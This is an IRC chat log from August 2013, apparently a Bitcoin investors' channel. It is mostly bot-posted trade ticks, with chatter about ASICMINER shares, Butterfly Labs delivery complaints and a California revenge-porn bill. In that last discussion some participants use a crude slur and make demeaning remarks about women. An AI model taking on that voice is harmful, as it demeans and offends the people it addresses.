[HAVELOCK] [AM100] 1 @ 0.0263 BTC [+] Aug 27 18:57:08 [BTCTC] [TAT.ASICMINER] 3 @ 0.02607 = 0.0782 BTC [+] Aug 27 18:58:06 [BTCTC] [TAT.ASICMINER] 3 @ 0.02607 = 0.0782 BTC [+] Aug 27 18:58:08 [BTCTC] [TAT.ASICMINER] 2 @ 0.02608 = 0.0522 BTC [+] Aug 27 18:58:24 [HAVELOCK] [XBOND] 11 @ 0.0011944 = 0.0131 BTC [+] Aug 27 18:58:32 [HAVELOCK] [XBOND] 390 @ 0.0011945 = 0.4659 BTC [+] Aug 27 18:58:49 dat xbond Aug 27 18:58:58 [BTCTC] [TAT.ASICMINER] 2 @ 0.02608 = 0.0522 BTC [+] Aug 27 18:59:04 I'm loving it Aug 27 19:00:52 [HAVELOCK] [XBOND] 1000 @ 0.0011998 = 1.1998 BTC [+] Aug 27 19:01:03 /g 1 Aug 27 19:01:36 you wish to see them? i prefer not to << im with him Aug 27 19:01:57 [HAVELOCK] [XBOND] 93 @ 0.0011998 = 0.1116 BTC [+] Aug 27 19:02:03 [HAVELOCK] [XBOND] 4 @ 0.0011998 = 0.0048 BTC [+] Aug 27 19:03:34 Anyone wanna have a guess at where AM is going to bottom? Aug 27 19:04:01 [BTCTC] [BTC-GROWTH] 3 @ 0.09971 = 0.2991 BTC [-] Aug 27 19:04:03 [HAVELOCK] [AM100] 16 @ 0.0263999 = 0.4224 BTC [+] Aug 27 19:04:10 Today or tomorrw? Aug 27 19:04:25 sorry forgot to include a timeframe, this week. Aug 27 19:04:36 hmmmmm Aug 27 19:04:57 San1ty-Work http://trilema.com/2013/bitcoin-assets-rules-and-regulations/ Aug 27 19:05:03 Probably 2.4 then back to 2.8 then 2.4 then back to 2.8 then 2.3 and then 2.8 Aug 27 19:05:04 esp of interest to you, #2. Aug 27 19:05:42 shit, this place has rules now Aug 27 19:05:46 that's lame Aug 27 19:06:14 div prediction for mining looks like it'll be 0.007 Aug 27 19:06:17 if i confess myself libertarian does that mean iget to ignore them? Aug 27 19:06:27 why is burnside being sketchy all of a sudden? Aug 27 19:06:45 thestringpuller: I wouldn't say all of a sudden, he doesn't communicate a lot. Aug 27 19:06:55 [HAVELOCK] [SMG] 50 @ 0.00024589 = 0.0123 BTC [-] Aug 27 19:07:07 smickles: spoke? Aug 27 19:07:08 lol Aug 27 19:07:12 [HAVELOCK] [SMG] 1 @ 0.00024589 BTC [-] Aug 27 19:07:17 yes Aug 27 19:07:17 [HAVELOCK] [SMG] 1 @ 0.00024589 BTC [-] Aug 27 19:07:22 you should see my space station smickles Aug 27 19:07:22 [HAVELOCK] [SMG] 1 @ 0.00024589 BTC [-] Aug 27 19:07:27 I can barely load it in kerbal space program Aug 27 19:07:28 mircea_popescu: "Devices must meet advertised performance (25 GH/s unit 40W, 400 GH/s unit 400W) " will people have to post kill-a-watt readings to confirm this? Aug 27 19:07:43 that'll certainly help. Aug 27 19:07:51 thestringpuller: clearly, you just need to patch unity for performance Aug 27 19:07:53 [HAVELOCK] [SMG] 4 @ 0.00024589 = 0.001 BTC [-] Aug 27 19:07:59 mircea_popescu: and if noone posts them? Aug 27 19:08:11 i guess we'll see then neh ? Aug 27 19:08:28 thestringpuller: put the save on github and link me :) Aug 27 19:08:41 [HAVELOCK] [SMG] 33 @ 0.00024589 = 0.0081 BTC [-] Aug 27 19:08:52 [BTCTC] [DMS.MINING] 11 @ 0.003756 = 0.0413 BTC [-] Aug 27 19:08:56 go unity! Aug 27 19:09:00 i kno rite. I'm using my space station as a construction yard for building a capital ship to send to Jool Aug 27 19:09:04 hardly ever crashes Aug 27 19:09:19 i'm trying to look at all the angles here. from what i read on the forums, it seems like punin himself has admitted it will miss spec numbers.... i guess he can lose the 10BTC, probably making 1000's w/ bitfury Aug 27 19:09:24 sometimes i still have to unity --replace Aug 27 19:09:32 but less in 13.04 than 12.04 Aug 27 19:09:56 possibly. nevertheless, the us supreme court doesn't make advisory judements, and for very good reasons. Aug 27 19:09:59 not much different here. Aug 27 19:10:22 hah ok. Aug 27 19:11:50 Rulother: I think we might see another flashcrash to values below 2 after div's tomorrow. unless they are surprisingly good 0.003. Aug 27 19:12:11 [BTCTC] [LTC-ATF.B2] 1 @ 0.01042 BTC [-] Aug 27 19:12:29 Rulother: I'm considering selling now and buying back tomorrow at a discount Aug 27 19:12:59 [BTCTC] [LABCOIN] 1 @ 0.003598 BTC [+] Aug 27 19:14:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.02604 = 0.0521 BTC [-] Aug 27 19:16:14 [BTCTC] [BASIC-MINING] 2 @ 0.2106 = 0.4212 BTC [-] Aug 27 19:16:15 /r/theonionwasright/ heh Aug 27 19:16:17 [BTCTC] [BASIC-MINING] 1 @ 0.2106 BTC [-] Aug 27 19:16:18 [BTCTC] [TAT.ASICMINER] 100 @ 0.0257 = 2.57 BTC [-] Aug 27 19:17:17 [BTCTC] [PAJKA.BOND] 1 @ 0.021 BTC [+] Aug 27 19:17:27 [BTCTC] [DMS.PURCHASE] 1 @ 0.01554 BTC [-] Aug 27 19:18:02 [BTCTC] [DMS.PURCHASE] 200 @ 0.01553 = 3.106 BTC [-] Aug 27 19:18:11 here's a lol : http://mileycyrusnude.org/ Aug 27 19:18:15 [BTCTC] [LABCOIN] 3 @ 0.003525 = 0.0106 BTC [-] Aug 27 19:18:27 noooooo Aug 27 19:18:31 I dont want that Aug 27 19:18:34 [BTCTC] [TAT.ASICMINER] 3 @ 0.02604 = 0.0781 BTC [+] Aug 27 19:18:39 LOL BANDWIDTH EXCEEDED Aug 27 19:19:57 [BTCTC] [DMS.PURCHASE] 1110 @ 0.01601 = 17.7711 BTC [+] Aug 27 19:20:27 [BTCTC] [LABCOIN] 26 @ 0.003598 = 0.0935 BTC [+] Aug 27 19:20:35 [MPEX] [S.MPOE] 5000 @ 0.00087485 = 4.3743 BTC [+] Aug 27 19:20:50 [BTCTC] [DMS.MINING] 3 @ 0.00375 = 0.0113 BTC [-] Aug 27 19:20:53 [BTCTC] [DMS.MINING] 3 @ 0.00375 = 0.0113 BTC [-] Aug 27 19:21:17 [BTCTC] [LABCOIN] 30 @ 0.003598 = 0.1079 BTC [+] Aug 27 19:22:23 ugh, what did i do to break grep dependancies Aug 27 19:22:28 [BTCTC] [LABCOIN] 40 @ 0.003598 = 0.1439 BTC [+] Aug 27 19:23:21 thestringpuller: on the spacestation thing? Aug 27 19:23:29 [BTCTC] [BITVPS] 1 @ 0.0026 BTC [+] Aug 27 19:23:53 just upload the parts folder and the persistence file Aug 27 19:24:08 no on mircea_popescu site Aug 27 19:24:17 mileycyrusnude.org Aug 27 19:24:19 lol Aug 27 19:24:53 that should just be a redirect to 4chan.org/gif Aug 27 19:25:02 [BTCTC] [DMS.PURCHASE] 8 @ 0.01601 = 0.1281 BTC [+] Aug 27 19:26:18 So yeah mp, I would like to refer you to #2 on http://trilema.com/2013/bitcoin-assets-rules-and-regulations/ ;) just kidding of course Aug 27 19:27:24 woah, how does one fall 8 minor revisions behind on grep? Aug 27 19:27:44 [HAVELOCK] [SDSTM] 3 @ 0.0041 = 0.0123 BTC [-] Aug 27 19:28:40 [BTCTC] [CB.IDIFF-O] 1 @ 0.009 BTC [-] Aug 27 19:29:42 [BTCTC] [LABCOIN] 30 @ 0.00355 = 0.1065 BTC [-] Aug 27 19:29:45 lol what'd i do Aug 27 19:30:05 here's a lol : http://mileycyrusnude.org/ << Aug 27 19:30:13 yea... ? Aug 27 19:30:21 [BTCTC] [LABCOIN] 135 @ 0.003598 = 0.4857 BTC [+] Aug 27 19:33:42 [BTCTC] [LABCOIN] 61 @ 0.003598 = 0.2195 BTC [+] Aug 27 19:37:26 [BTCTC] [LTC-ATF.B2] 1000 @ 0.01042 = 10.42 BTC [-] Aug 27 19:38:17 [BTCTC] [LABCOIN] 400 @ 0.0036 = 1.44 BTC [+] Aug 27 19:39:32 [BTCTC] [LABCOIN] 2500 @ 0.00362 = 9.05 BTC [+] Aug 27 19:42:49 [BTCTC] [LABCOIN] 7 @ 0.00362 = 0.0253 BTC [+] Aug 27 19:46:07 [BTCTC] [ASICMINER-PT] 3 @ 2.63 = 7.89 BTC [-] Aug 27 19:46:22 [BTCTC] [DMS.PURCHASE] 1 @ 0.01601 BTC [+] Aug 27 19:46:45 [BTCTC] [DMS.MINING] 13 @ 0.003699 = 0.0481 BTC [-] Aug 27 19:47:45 [BTCTC] [NASTY-PT] 1 @ 0.002261 BTC [+] Aug 27 19:48:47 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001126 BTC [-] Aug 27 19:49:58 [BTCTC] [DMS.PURCHASE] 1 @ 0.01601 BTC [+] Aug 27 19:50:56 [BTCTC] [BASIC-MINING] 2 @ 0.2235 = 0.447 BTC [+] Aug 27 19:51:17 [BTCTC] [HOSTED-MINING] 1 @ 0.00279 BTC [-] Aug 27 19:51:40 [BTCTC] [ASICMINER-PT] 1 @ 2.628 BTC [-] Aug 27 19:52:18 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001125 BTC [-] Aug 27 19:53:23 [BTCTC] [ACTIVEMINING] 16 @ 0.005211 = 0.0834 BTC [-] Aug 27 19:53:25 [BTCTC] [ACTIVEMINING] 50 @ 0.00521 = 0.2605 BTC [-] Aug 27 19:54:06 [BTCTC] [LABCOIN] 95 @ 0.00362 = 0.3439 BTC [+] Aug 27 19:54:10 why is burnside being sketchy all of a sudden? <<< it's not all that sudden Aug 27 19:55:07 [HAVELOCK] [SMG] 3 @ 0.00021 = 0.0006 BTC [-] Aug 27 19:55:10 [BTCTC] [BASIC-MINING] 1 @ 0.2231 BTC [-] Aug 27 19:56:12 [BTCTC] [LABCOIN] 1598 @ 0.00362 = 5.7848 BTC [+] Aug 27 19:56:44 [BTCTC] [LABCOIN] 1 @ 0.003647 BTC [+] Aug 27 19:56:44 [BTCTC] [LABCOIN] 95 @ 0.003647 = 0.3465 BTC [+] Aug 27 19:57:13 [BTCTC] [LABCOIN] 95 @ 0.00365 = 0.3468 BTC [+] Aug 27 19:57:14 [BTCTC] [LABCOIN] 500 @ 0.00368 = 1.84 BTC [+] Aug 27 19:57:45 [BTCTC] [LABCOIN] 1000 @ 0.003699 = 3.699 BTC [+] Aug 27 19:57:57 [BTCTC] [ASICMINER-PT] 1 @ 2.63 BTC [+] Aug 27 19:59:10 [BTCTC] [TAT.ASICMINER] 3 @ 0.02604 = 0.0781 BTC [+] Aug 27 19:59:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.02605 BTC [+] Aug 27 19:59:41 [BTCTC] [TAT.ASICMINER] 7 @ 0.02605 = 0.1824 BTC [+] Aug 27 19:59:51 [BTCTC] [DMS.PURCHASE] 2 @ 0.01555 = 0.0311 BTC [-] Aug 27 20:00:06 [BTCTC] [DMS.MINING] 28 @ 0.00369 = 0.1033 BTC [-] Aug 27 20:00:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.02605 BTC [+] Aug 27 20:00:51 [BTCTC] [ASICMINER-PT] 1 @ 2.641 BTC [+] Aug 27 20:01:44 [BTCTC] [LABCOIN] 250 @ 0.0037 = 0.925 BTC [+] Aug 27 20:02:01 [BTCTC] [PAJKA.BOND] 4 @ 0.015 = 0.06 BTC [-] Aug 27 20:02:03 [BTCTC] [PAJKA.BOND] 1 @ 0.015 BTC [-] Aug 27 20:03:19 [BTCTC] [DMS.MINING] 150 @ 0.00355 = 0.5325 BTC [-] Aug 27 20:03:45 [HAVELOCK] [XBOND] 1 @ 0.0011998 BTC [+] Aug 27 20:03:48 [BTCTC] [DMS.MINING] 5 @ 0.00369 = 0.0185 BTC [+] Aug 27 20:05:28 http://www.theverge.com/2013/8/27/4663566/california-moves-to-outlaw-revenge-porn Aug 27 20:05:29 [BTCTC] [DMS.PURCHASE] 1 @ 0.01601 BTC [+] Aug 27 20:05:30 California moves to outlaw 'revenge porn' | The Verge Aug 27 20:06:41 [HAVELOCK] [SDSTM] 1 @ 0.004 BTC [-] Aug 27 20:06:43 [HAVELOCK] [SDSTM] 4 @ 0.004 = 0.016 BTC [-] Aug 27 20:06:50 it's more like "pay us to take your cunt off our website" blackmail porn innit ? Aug 27 20:07:11 What is revenge porn? Aug 27 20:07:56 that's when you upload porn for revenge Aug 27 20:08:17 [MPEX] [S.MPOE] 5100 @ 0.00087485 = 4.4617 BTC [+] Aug 27 20:08:19 [MPEX] [S.MPOE] 4868 @ 0.00087574 = 4.2631 BTC [+] Aug 27 20:08:34 [MPEX] [S.MPOE] 332 @ 0.00087657 = 0.291 BTC [+] Aug 27 20:08:39 dr. dre said you can't make a ho a housewife Aug 27 20:08:42 ymmv Aug 27 20:10:34 [BTCTC] [LABCOIN] 4 @ 0.003705 = 0.0148 BTC [+] Aug 27 20:10:50 [BTCTC] [ASICMINER-PT] 1 @ 2.642 BTC [+] Aug 27 20:10:51 [BTCTC] [ASICMINER-PT] 1 @ 2.646 BTC [+] Aug 27 20:10:52 [BTCTC] [ASICMINER-PT] 1 @ 2.649 BTC [+] Aug 27 20:10:54 [BTCTC] [ASICMINER-PT] 1 @ 2.67 BTC [+] Aug 27 20:10:55 [BTCTC] [ASICMINER-PT] 1 @ 2.68 BTC [+] Aug 27 20:14:13 I don't understand this law. Obviously posting private pictures is already illegal. Aug 27 20:14:16 [BTCTC] [DMS.MINING] 1 @ 0.003513 BTC [-] Aug 27 20:14:18 [BTCTC] [DMS.MINING] 30 @ 0.003512 = 0.1054 BTC [-] Aug 27 20:14:19 [BTCTC] [DMS.MINING] 1 @ 0.003511 BTC [-] Aug 27 20:14:20 [BTCTC] [DMS.MINING] 12 @ 0.003501 = 0.042 BTC [-] Aug 27 20:14:21 [BTCTC] [DMS.MINING] 3 @ 0.0035 = 0.0105 BTC [-] Aug 27 20:14:23 [BTCTC] [DMS.MINING] 500 @ 0.0035 = 1.75 BTC [-] Aug 27 20:14:23 [BTCTC] [DMS.MINING] 350 @ 0.0035 = 1.225 BTC [-] Aug 27 20:14:38 Tumblr would basically be outlawed in CA then Aug 27 20:14:55 [BTCTC] [TAT.MINIGAME] 13 @ 0.0002645 = 0.0034 BTC [-] Aug 27 20:15:03 why? most tumblr porn pics are pro porn Aug 27 20:15:24 pankkake not really. Aug 27 20:15:24 There are a lot that are obviously not so pro Aug 27 20:15:44 For record, I don't use tumblr for that lol Aug 27 20:15:48 for the record* Aug 27 20:15:54 I only use tumblr for that Aug 27 20:15:59 photgraphs are the property of the photographer, not of the model. Aug 27 20:16:44 I had pictures of me taken, and I signed a release for it Aug 27 20:16:53 French law, however Aug 27 20:16:53 [BTCTC] [ACTIVEMINING] 5 @ 0.005379 = 0.0269 BTC [+] Aug 27 20:16:54 [BTCTC] [ACTIVEMINING] 22 @ 0.00538 = 0.1184 BTC [+] Aug 27 20:16:55 [BTCTC] [ACTIVEMINING] 11 @ 0.005389 = 0.0593 BTC [+] Aug 27 20:16:56 [BTCTC] [ACTIVEMINING] 100 @ 0.00539 = 0.539 BTC [+] Aug 27 20:17:10 [BTCTC] [BASIC-MINING] 10 @ 0.2208 = 2.208 BTC [-] Aug 27 20:17:35 by the way, TOR is a step ahead, I found out there is a "revenge porn" website there Aug 27 20:17:38 if you don't sign a release you can prosecute the author for their gains at common law, Aug 27 20:17:42 but that's pretty much all. Aug 27 20:18:14 [BTCTC] [BASIC-MINING] 1 @ 0.2209 BTC [+] Aug 27 20:20:53 [BTCTC] [LABCOIN] 51 @ 0.003647 = 0.186 BTC [-] Aug 27 20:22:47 [HAVELOCK] [XBOND] 1 @ 0.0011998 BTC [+] Aug 27 20:22:54 [BTCTC] [LABCOIN] 5 @ 0.003591 = 0.018 BTC [-] Aug 27 20:28:53 [BTCTC] [LTC-ATF.B2] 2 @ 0.01042 = 0.0208 BTC [-] Aug 27 20:29:51 [BTCTC] [LABCOIN] 5 @ 0.003704 = 0.0185 BTC [+] Aug 27 20:29:52 [BTCTC] [LABCOIN] 1919 @ 0.003705 = 7.1099 BTC [+] Aug 27 20:30:35 [BTCTC] [LABCOIN] 565 @ 0.003708 = 2.095 BTC [+] Aug 27 20:30:37 [BTCTC] [LABCOIN] 339 @ 0.003712 = 1.2584 BTC [+] Aug 27 20:30:38 [BTCTC] [LABCOIN] 50 @ 0.003713 = 0.1857 BTC [+] Aug 27 20:30:39 [BTCTC] [LABCOIN] 546 @ 0.003715 = 2.0284 BTC [+] Aug 27 20:31:20 [BTCTC] [LABCOIN] 34 @ 0.003715 = 0.1263 BTC [+] Aug 27 20:32:06 [BTCTC] [LABCOIN] 420 @ 0.003715 = 1.5603 BTC [+] Aug 27 20:38:44 [BTCTC] [TAT.MINIGAME] 25 @ 0.000235 = 0.0059 BTC [-] Aug 27 20:41:07 [BTCTC] [HOSTED-MINING] 3 @ 0.00279 = 0.0084 BTC [-] Aug 27 20:43:09 [BTCTC] [LABCOIN] 265 @ 0.003718 = 0.9853 BTC [+] Aug 27 20:46:25 [BTCTC] [LABCOIN] 23 @ 0.003597 = 0.0827 BTC [-] Aug 27 20:46:27 [BTCTC] [LABCOIN] 95 @ 0.003596 = 0.3416 BTC [-] Aug 27 20:46:28 [BTCTC] [LABCOIN] 132 @ 0.003593 = 0.4743 BTC [-] Aug 27 20:47:36 [BTCTC] [TAT.VIRTUALMINE] 16 @ 0.001119 = 0.0179 BTC [-] Aug 27 20:57:08 [BTCTC] [ASICMINER-PT] 1 @ 2.61 BTC [-] Aug 27 20:57:43 [BTCTC] [TAT.ASICMINER] 35 @ 0.0256 = 0.896 BTC [-] Aug 27 21:03:17 https://bitcointalk.org/index.php?topic=282263.0 Aug 27 21:03:23 To all BFL Customers Aug 27 21:03:46 sorta 5/10 Aug 27 21:04:00 whaaaaa no way Aug 27 21:04:05 no way Aug 27 21:04:56 [HAVELOCK] [XBOND] 1 @ 0.0011998 BTC [+] Aug 27 21:04:57 Ahhh nevermind Aug 27 21:05:01 troll hard Aug 27 21:05:36 did the Onion decide to pursue bitcoiners now? Aug 27 21:05:49 That would be amazing Aug 27 21:09:09 [BTCTC] [LABCOIN] 100 @ 0.003697 = 0.3697 BTC [+] Aug 27 21:09:18 [BTCTC] [ACTIVEMINING] 38 @ 0.00525 = 0.1995 BTC [-] Aug 27 21:09:19 [BTCTC] [ACTIVEMINING] 43 @ 0.005221 = 0.2245 BTC [-] Aug 27 21:09:21 [BTCTC] [ACTIVEMINING] 175 @ 0.00522 = 0.9135 BTC [-] Aug 27 21:09:21 [BTCTC] [ACTIVEMINING] 4 @ 0.005209 = 0.0208 BTC [-] Aug 27 21:09:22 [BTCTC] [ACTIVEMINING] 17 @ 0.005208 = 0.0885 BTC [-] Aug 27 21:09:23 [BTCTC] [ACTIVEMINING] 185 @ 0.005202 = 0.9624 BTC [-] Aug 27 21:09:24 [BTCTC] [ACTIVEMINING] 520 @ 0.005201 = 2.7045 BTC [-] Aug 27 21:09:26 [BTCTC] [ACTIVEMINING] 22 @ 0.0052 = 0.1144 BTC [-] Aug 27 21:10:35 [BTCTC] [ACTIVEMINING] 1 @ 0.005389 BTC [+] Aug 27 21:11:45 [BTCTC] [ACTIVEMINING] 1 @ 0.00539 BTC [+] Aug 27 21:13:00 http://www.reddit.com/r/BitcoinMining/comments/1l5oz5/kansas_ag_replied_to_my_consumer_protection/ Aug 27 21:13:17 Kansas AG replied to my consumer protection complaint against Butterfly Labs Aug 27 21:13:21 I actually filled that out earlier Aug 27 21:14:31 [BTCTC] [ASICMINER-PT] 3 @ 2.61 = 7.83 BTC [-] Aug 27 21:15:21 I imagine a new flood of cases being opened by the KAG Aug 27 21:15:28 [BTCTC] [ASICMINER-PT] 1 @ 2.61 BTC [-] Aug 27 21:17:25 http://vimeo.com/73209233 CoinTerra explaining how great they are Aug 27 21:17:31 CoinTerra, the evolution of Bitcoin Mining on Vimeo Aug 27 21:23:15 [BTCTC] [ACTIVEMINING] 49 @ 0.005201 = 0.2548 BTC [-] Aug 27 21:23:17 [BTCTC] [ACTIVEMINING] 199 @ 0.0052 = 1.0348 BTC [-] Aug 27 21:23:42 [BTCTC] [TAT.ASICMINER] 7 @ 0.0256 = 0.1792 BTC [-] Aug 27 21:24:18 [BTCTC] [TAT.ASICMINER] 4 @ 0.02555 = 0.1022 BTC [-] Aug 27 21:24:19 [BTCTC] [TAT.ASICMINER] 4 @ 0.02555 = 0.1022 BTC [-] Aug 27 21:24:21 [BTCTC] [TAT.ASICMINER] 5 @ 0.02554 = 0.1277 BTC [-] Aug 27 21:24:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.02551 BTC [-] Aug 27 21:24:22 [BTCTC] [TAT.ASICMINER] 5 @ 0.02551 = 0.1276 BTC [-] Aug 27 21:24:23 [BTCTC] [TAT.ASICMINER] 32 @ 0.0255 = 0.816 BTC [-] Aug 27 21:24:24 [BTCTC] [TAT.ASICMINER] 19 @ 0.0255 = 0.4845 BTC [-] Aug 27 21:24:26 [BTCTC] [TAT.ASICMINER] 7 @ 0.0255 = 0.1785 BTC [-] Aug 27 21:24:27 [BTCTC] [TAT.ASICMINER] 13 @ 0.02515 = 0.327 BTC [-] Aug 27 21:24:28 [BTCTC] [TAT.ASICMINER] 10 @ 0.02512 = 0.2512 BTC [-] Aug 27 21:25:16 ThickAsThieves which are these ? Aug 27 21:29:27 the guy from Samsung Aug 27 21:29:37 [MPEX] [S.MPOE] 7300 @ 0.00087517 = 6.3887 BTC [-] Aug 27 21:29:38 with superduper efficient chips coming this December Aug 27 21:29:39 [MPEX] [S.MPOE] 7500 @ 0.0008735 = 6.5513 BTC [-] Aug 27 21:29:52 December might as well be 2020 Aug 27 21:30:00 2PH worth or sumth Aug 27 21:30:31 http://thegenesisblock.com/cointerra-expects-to-deliver-2-phs-of-asics-in-december/ Aug 27 21:30:42 Cointerra Expects to Deliver 2 PH/s of ASICs in December - The Genesis Block Aug 27 21:30:53 $5.74 per GH Aug 27 21:31:24 [BTCTC] [TAT.MINIGAME] 10 @ 0.000233 = 0.0023 BTC [-] Aug 27 21:32:47 [BTCTC] [ACTIVEMINING] 1 @ 0.005171 BTC [-] Aug 27 21:32:48 [BTCTC] [ACTIVEMINING] 341 @ 0.005166 = 1.7616 BTC [-] Aug 27 21:32:49 [BTCTC] [ACTIVEMINING] 1429 @ 0.005165 = 7.3808 BTC [-] Aug 27 21:34:07 [BTCTC] [TAT.MINIGAME] 3 @ 0.0002325 = 0.0007 BTC [-] Aug 27 21:34:33 [BTCTC] [ASICMINER-PT] 1 @ 2.685 BTC [+] Aug 27 21:34:34 [BTCTC] [HOSTED-MINING] 465 @ 0.00279 = 1.2974 BTC [-] Aug 27 21:34:47 mircea_popescu https://bitcointalk.org/index.php?topic=125629.msg3019912;topicseen#new Aug 27 21:35:14 i think he is calling you out Aug 27 21:35:21 albeit in an incomplete sentence Aug 27 21:35:34 [BTCTC] [ASICMINER-PT] 1 @ 2.689 BTC [+] Aug 27 21:35:35 [BTCTC] [ASICMINER-PT] 1 @ 2.69 BTC [+] Aug 27 21:35:46 lul Aug 27 21:36:07 he'd better call me out here. Aug 27 21:36:13 who goes to sea to call out a bear ? Aug 27 21:36:16 I like how the second line is reserved, class act trolling Aug 27 21:37:23 [BTCTC] [TAT.ASICMINER] 2 @ 0.02605 = 0.0521 BTC [+] Aug 27 21:37:53 o, so the wanna-bes had figurted the power of mpex comes from volume ? Aug 27 21:37:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.02605 = 0.0521 BTC [+] Aug 27 21:38:09 turns out that's a convenient theory, as they can easily fake it, but sadly not quite accurate. Aug 27 21:38:14 a well, live and learn i guess. Aug 27 21:38:18 "by the power of MPEX, I release thee" Aug 27 21:38:46 or dont learn Aug 27 21:38:52 humans be humans Aug 27 21:39:30 i dont think there's anything else for me to say to him, his response is light and airy Aug 27 21:39:31 https://bitcointalk.org/index.php?topic=92267.0;all Aug 27 21:39:35 Re: [CLOSING] PUREASIC: Shipping imminent Aug 27 21:39:36 this is the best thread on btctalk imo. Aug 27 21:39:55 PUREASIC: Shipping imminent July 08, 2012, 05:47:10 PM Aug 27 21:39:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.02605 = 0.0521 BTC [+] Aug 27 21:40:05 "According to BFL the order with 15 SC Singles has shipped." < today. Aug 27 21:40:11 about 13 months later. imminent! Aug 27 21:40:43 just 2 more weeks Aug 27 21:41:17 still, they're shipping a lot of hash power every day now Aug 27 21:41:25 so i hear. Aug 27 21:41:26 http://i.imgur.com/Vvz20hO.png Aug 27 21:41:42 [BTCTC] [LABCOIN] 2 @ 0.003694 = 0.0074 BTC [-] Aug 27 21:41:46 had to get the advertisment in there Aug 27 21:41:58 [BTCTC] [TAT.ASICMINER] 2 @ 0.02605 = 0.0521 BTC [+] Aug 27 21:42:05 why are the fonds borked? Aug 27 21:42:18 fonts Aug 27 21:42:22 tigers can change their stripes Aug 27 21:42:29 is that a legit post from the CEO Aug 27 21:43:06 "some of you may have heard about the new widget we are building" Aug 27 21:43:10 that's not him Aug 27 21:43:37 [MPEX] [S.MPOE] 5600 @ 0.00087657 = 4.9088 BTC [+] Aug 27 21:43:51 Yeah I did some very brief reading of the post and was like no way, but after you actually read it... Aug 27 21:44:22 if it is him he's drunk and it's too late to be posting on forums... Aug 27 21:44:30 im pretty sure it's trolling Aug 27 21:44:35 yeah me too Aug 27 21:44:38 yeah Aug 27 21:44:43 that widget sentence was the icing for me Aug 27 21:44:49 kinda 5/10 trolling at that. Aug 27 21:44:54 that shit is hilarious Aug 27 21:45:23 if I was the BFL web dev/marketing person Aug 27 21:45:31 i definitely call it a widget on the site Aug 27 21:45:32 [HAVELOCK] [VTX] 7 @ 0.61 = 4.27 BTC [+] Aug 27 21:45:49 Pre-order the new 1.2 TH/s widget deluxe" Aug 27 21:46:12 hehe https://bitcointalk.org/index.php?topic=235763.msg3020443#msg3020443 Aug 27 21:46:21 "Judging by the average intelligence of this thread, I expect share price to now be 500btc" Aug 27 21:48:17 [BTCTC] [ASICMINER-PT] 1 @ 2.607 BTC [-] Aug 27 21:48:20 [BTCTC] [ASICMINER-PT] 1 @ 2.606 BTC [-] Aug 27 21:48:20 [BTCTC] [ASICMINER-PT] 1 @ 2.605 BTC [-] Aug 27 21:48:21 [BTCTC] [ASICMINER-PT] 1 @ 2.601 BTC [-] Aug 27 21:48:22 [BTCTC] [ASICMINER-PT] 2 @ 2.601 = 5.202 BTC [-] Aug 27 21:48:24 [BTCTC] [ASICMINER-PT] 10 @ 2.6 = 26 BTC [-] Aug 27 21:48:25 [BTCTC] [ASICMINER-PT] 2 @ 2.551 = 5.102 BTC [-] Aug 27 21:48:26 [BTCTC] [ASICMINER-PT] 1 @ 2.55 BTC [-] Aug 27 21:48:27 or not Aug 27 21:48:27 [BTCTC] [ASICMINER-PT] 1 @ 2.536 BTC [-] Aug 27 21:48:28 [BTCTC] [ASICMINER-PT] 1 @ 2.522 BTC [-] Aug 27 21:48:29 [BTCTC] [ASICMINER-PT] 1 @ 2.521 BTC [-] Aug 27 21:48:29 vroom Aug 27 21:48:29 [BTCTC] [ASICMINER-PT] 10 @ 2.511 = 25.11 BTC [-] Aug 27 21:51:20 "You made a promise to your customers to ship in order of paid orders received, not by product line, yet people who ordered in January of 2013 are getting their products before people that ordered in July of 2012. How is that fair? You are also breaking up Mini Rig orders into three parts and shipping 1/3 at a time when there were a lot of preferred customers that received their entire allotment of Rigs in one shot ie the guy on your Monarch Aug 27 21:51:20 order page. That is very unethical." Aug 27 21:51:34 the bfl stuff is going to be such a courtfest next year... Aug 27 21:51:58 https://bitcointalk.org/index.php?topic=282376.0 Aug 27 21:52:02 Mining with a Zipit Z2 (crappy old wireless instant messenger) Aug 27 21:52:04 new 52kh miner Aug 27 21:52:41 at this point its pretty much a strategy Aug 27 21:52:55 let BFL fuck up, miners are worthless now anyway Aug 27 21:53:04 get theoretical value outta them instead in court Aug 27 21:53:12 ThickAsThieves indeed. Aug 27 21:54:32 Regards, Aug 27 21:54:32 In February this year I made an order for a Jalapeno, after two months or so, I requested by email the delivery and was told it would be for June, so that about the beginning of May, I decided to place another order, this rather larger, which divided into two parts. Aug 27 21:56:31 I really wish I wouldn't have to go through such lengths to get my money back Aug 27 21:56:41 [HAVELOCK] [XBOND] 1 @ 0.00113 BTC [-] Aug 27 21:56:55 [HAVELOCK] [XBOND] 1 @ 0.0012 BTC [+] Aug 27 21:57:08 [HAVELOCK] [XBOND] 1 @ 0.00113 BTC [-] Aug 27 21:57:17 [HAVELOCK] [XBOND] 1 @ 0.0012 BTC [+] Aug 27 21:57:33 [HAVELOCK] [XBOND] 1 @ 0.00113 BTC [-] Aug 27 21:57:34 o nice Aug 27 21:57:42 [HAVELOCK] [XBOND] 1 @ 0.0012 BTC [+] Aug 27 21:58:40 https://bitcointalk.org/index.php?topic=278844.0 Aug 27 21:58:44 Time to sue ButterflyLabs - Big Single-SC owner let's league for class action Aug 27 21:59:00 [HAVELOCK] [VTX] 3 @ 0.61 = 1.83 BTC [+] Aug 27 21:59:10 [HAVELOCK] [XBOND] 19 @ 0.0012 = 0.0228 BTC [+] Aug 27 21:59:22 [HAVELOCK] [XBOND] 100 @ 0.0012 = 0.12 BTC [+] Aug 27 22:00:17 [HAVELOCK] [XBOND] 851 @ 0.0012 = 1.0212 BTC [+] Aug 27 22:00:46 [BTCTC] [ASICMINER-PT] 1 @ 2.597 BTC [+] Aug 27 22:00:48 [BTCTC] [ASICMINER-PT] 3 @ 2.599 = 7.797 BTC [+] Aug 27 22:00:49 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [+] Aug 27 22:09:22 [BTCTC] [HOSTED-MINING] 38 @ 0.00279 = 0.106 BTC [-] Aug 27 22:09:57 [HAVELOCK] [VTX] 1 @ 0.61 BTC [+] Aug 27 22:12:21 